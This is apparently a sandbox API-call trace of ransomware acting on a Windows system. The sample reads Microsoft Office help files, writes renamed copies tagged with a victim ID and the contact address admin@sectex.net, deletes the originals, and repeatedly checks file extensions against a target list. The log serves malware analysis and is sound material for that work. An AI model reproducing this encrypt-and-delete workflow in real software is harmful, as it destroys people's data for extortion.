	[0147.657] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0147.657] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0147.658] lstrlenW (lpString="MSACCESS.DEV_F_COL.HXK") returned 22
	[0147.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.658] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0147.658] CloseHandle (hObject=0x268) returned 1
	[0147.658] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_f_col.hxk")) returned 0x20
	[0147.658] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.659] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.659] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.661] GetLastError () returned 0x0
	[0147.661] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0147.662] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0147.662] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.662] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x100, lpOverlapped=0x0) returned 1
	[0147.663] SetEndOfFile (hFile=0x384) returned 1
	[0147.663] CloseHandle (hObject=0x384) returned 1
	[0147.663] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.663] SetEndOfFile (hFile=0x268) returned 1
	[0147.665] CloseHandle (hObject=0x268) returned 1
	[0147.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.665] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_f_col.hxk")) returned 1
	[0147.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.666] lstrlenW (lpString=".doc") returned 4
	[0147.666] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.666] lstrlenW (lpString=".docx") returned 5
	[0147.666] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.666] lstrlenW (lpString=".pdf") returned 4
	[0147.666] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.666] lstrlenW (lpString=".xls") returned 4
	[0147.666] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.666] lstrlenW (lpString=".xlsx") returned 5
	[0147.666] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.666] lstrlenW (lpString=".ppt") returned 4
	[0147.666] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.666] lstrlenW (lpString=".zip") returned 4
	[0147.666] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.666] lstrlenW (lpString=".rar") returned 4
	[0147.666] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.666] lstrlenW (lpString=".bz2") returned 4
	[0147.667] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.667] lstrlenW (lpString=".7z") returned 3
	[0147.667] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.667] lstrlenW (lpString=".dbf") returned 4
	[0147.667] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.667] lstrlenW (lpString=".1cd") returned 4
	[0147.667] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.667] lstrlenW (lpString=".jpg") returned 4
	[0147.667] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.667] lstrlenW (lpString=".doc") returned 4
	[0147.667] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.667] lstrlenW (lpString=".docx") returned 5
	[0147.667] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.667] lstrlenW (lpString=".pdf") returned 4
	[0147.667] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.667] lstrlenW (lpString=".xls") returned 4
	[0147.667] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.667] lstrlenW (lpString=".xlsx") returned 5
	[0147.667] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.667] lstrlenW (lpString=".ppt") returned 4
	[0147.667] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.667] lstrlenW (lpString=".zip") returned 4
	[0147.667] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.667] lstrlenW (lpString=".rar") returned 4
	[0147.667] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.668] lstrlenW (lpString=".bz2") returned 4
	[0147.668] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.668] lstrlenW (lpString=".7z") returned 3
	[0147.668] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.668] lstrlenW (lpString=".dbf") returned 4
	[0147.668] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.668] lstrlenW (lpString=".1cd") returned 4
	[0147.668] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK") returned 70
	[0147.668] lstrlenW (lpString=".jpg") returned 4
	[0147.668] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.668] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0147.668] lstrlenW (lpString="MSACCESS.DEV_K_COL.HXK") returned 22
	[0147.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.669] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0147.669] CloseHandle (hObject=0x268) returned 1
	[0147.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_k_col.hxk")) returned 0x20
	[0147.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.669] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.669] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.670] GetLastError () returned 0x0
	[0147.670] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0147.671] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0147.672] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.672] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x100, lpOverlapped=0x0) returned 1
	[0147.672] SetEndOfFile (hFile=0x384) returned 1
	[0147.672] CloseHandle (hObject=0x384) returned 1
	[0147.672] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.672] SetEndOfFile (hFile=0x268) returned 1
	[0147.675] CloseHandle (hObject=0x268) returned 1
	[0147.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.675] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_k_col.hxk")) returned 1
	[0147.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.675] lstrlenW (lpString=".doc") returned 4
	[0147.676] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.676] lstrlenW (lpString=".docx") returned 5
	[0147.676] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.676] lstrlenW (lpString=".pdf") returned 4
	[0147.676] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.676] lstrlenW (lpString=".xls") returned 4
	[0147.676] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.676] lstrlenW (lpString=".xlsx") returned 5
	[0147.676] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.676] lstrlenW (lpString=".ppt") returned 4
	[0147.676] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.676] lstrlenW (lpString=".zip") returned 4
	[0147.676] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.676] lstrlenW (lpString=".rar") returned 4
	[0147.676] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.676] lstrlenW (lpString=".bz2") returned 4
	[0147.676] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.676] lstrlenW (lpString=".7z") returned 3
	[0147.676] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.676] lstrlenW (lpString=".dbf") returned 4
	[0147.676] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.676] lstrlenW (lpString=".1cd") returned 4
	[0147.676] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.676] lstrlenW (lpString=".jpg") returned 4
	[0147.676] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.677] lstrlenW (lpString=".doc") returned 4
	[0147.677] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.677] lstrlenW (lpString=".docx") returned 5
	[0147.677] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.677] lstrlenW (lpString=".pdf") returned 4
	[0147.677] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.677] lstrlenW (lpString=".xls") returned 4
	[0147.677] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.678] lstrlenW (lpString=".xlsx") returned 5
	[0147.678] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.678] lstrlenW (lpString=".ppt") returned 4
	[0147.678] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.678] lstrlenW (lpString=".zip") returned 4
	[0147.678] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.678] lstrlenW (lpString=".rar") returned 4
	[0147.678] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.678] lstrlenW (lpString=".bz2") returned 4
	[0147.678] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.678] lstrlenW (lpString=".7z") returned 3
	[0147.678] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.678] lstrlenW (lpString=".dbf") returned 4
	[0147.678] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.678] lstrlenW (lpString=".1cd") returned 4
	[0147.678] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK") returned 70
	[0147.678] lstrlenW (lpString=".jpg") returned 4
	[0147.678] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.678] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0147.678] lstrlenW (lpString="MSACCESS.HXS") returned 12
	[0147.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.679] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=3877906) returned 1
	[0147.679] CloseHandle (hObject=0x268) returned 1
	[0147.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.hxs")) returned 0x20
	[0147.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.679] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0147.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.679] lstrlenW (lpString=".doc") returned 4
	[0147.679] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.679] lstrlenW (lpString=".docx") returned 5
	[0147.679] lstrcmpiW (lpString1=".docx", lpString2="S.HXS") returned -1
	[0147.680] lstrlenW (lpString=".pdf") returned 4
	[0147.680] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.680] lstrlenW (lpString=".xls") returned 4
	[0147.680] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.680] lstrlenW (lpString=".xlsx") returned 5
	[0147.680] lstrcmpiW (lpString1=".xlsx", lpString2="S.HXS") returned -1
	[0147.680] lstrlenW (lpString=".ppt") returned 4
	[0147.680] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.680] lstrlenW (lpString=".zip") returned 4
	[0147.680] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.680] lstrlenW (lpString=".rar") returned 4
	[0147.680] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.680] lstrlenW (lpString=".bz2") returned 4
	[0147.680] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.680] lstrlenW (lpString=".7z") returned 3
	[0147.680] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.680] lstrlenW (lpString=".dbf") returned 4
	[0147.680] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.680] lstrlenW (lpString=".1cd") returned 4
	[0147.680] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.680] lstrlenW (lpString=".jpg") returned 4
	[0147.680] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.680] lstrlenW (lpString=".doc") returned 4
	[0147.680] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.680] lstrlenW (lpString=".docx") returned 5
	[0147.680] lstrcmpiW (lpString1=".docx", lpString2="S.HXS") returned -1
	[0147.681] lstrlenW (lpString=".pdf") returned 4
	[0147.681] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.681] lstrlenW (lpString=".xls") returned 4
	[0147.681] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.681] lstrlenW (lpString=".xlsx") returned 5
	[0147.681] lstrcmpiW (lpString1=".xlsx", lpString2="S.HXS") returned -1
	[0147.681] lstrlenW (lpString=".ppt") returned 4
	[0147.681] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.681] lstrlenW (lpString=".zip") returned 4
	[0147.681] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.681] lstrlenW (lpString=".rar") returned 4
	[0147.681] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.681] lstrlenW (lpString=".bz2") returned 4
	[0147.681] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.681] lstrlenW (lpString=".7z") returned 3
	[0147.681] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.681] lstrlenW (lpString=".dbf") returned 4
	[0147.681] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.681] lstrlenW (lpString=".1cd") returned 4
	[0147.681] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS") returned 60
	[0147.681] lstrlenW (lpString=".jpg") returned 4
	[0147.681] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.681] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0147.681] lstrlenW (lpString="MSACCESS_COL.HXC") returned 16
	[0147.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.682] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=636) returned 1
	[0147.682] CloseHandle (hObject=0x268) returned 1
	[0147.682] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxc")) returned 0x20
	[0147.682] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.683] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.683] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.683] GetLastError () returned 0x0
	[0147.683] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x27c, lpOverlapped=0x0) returned 1
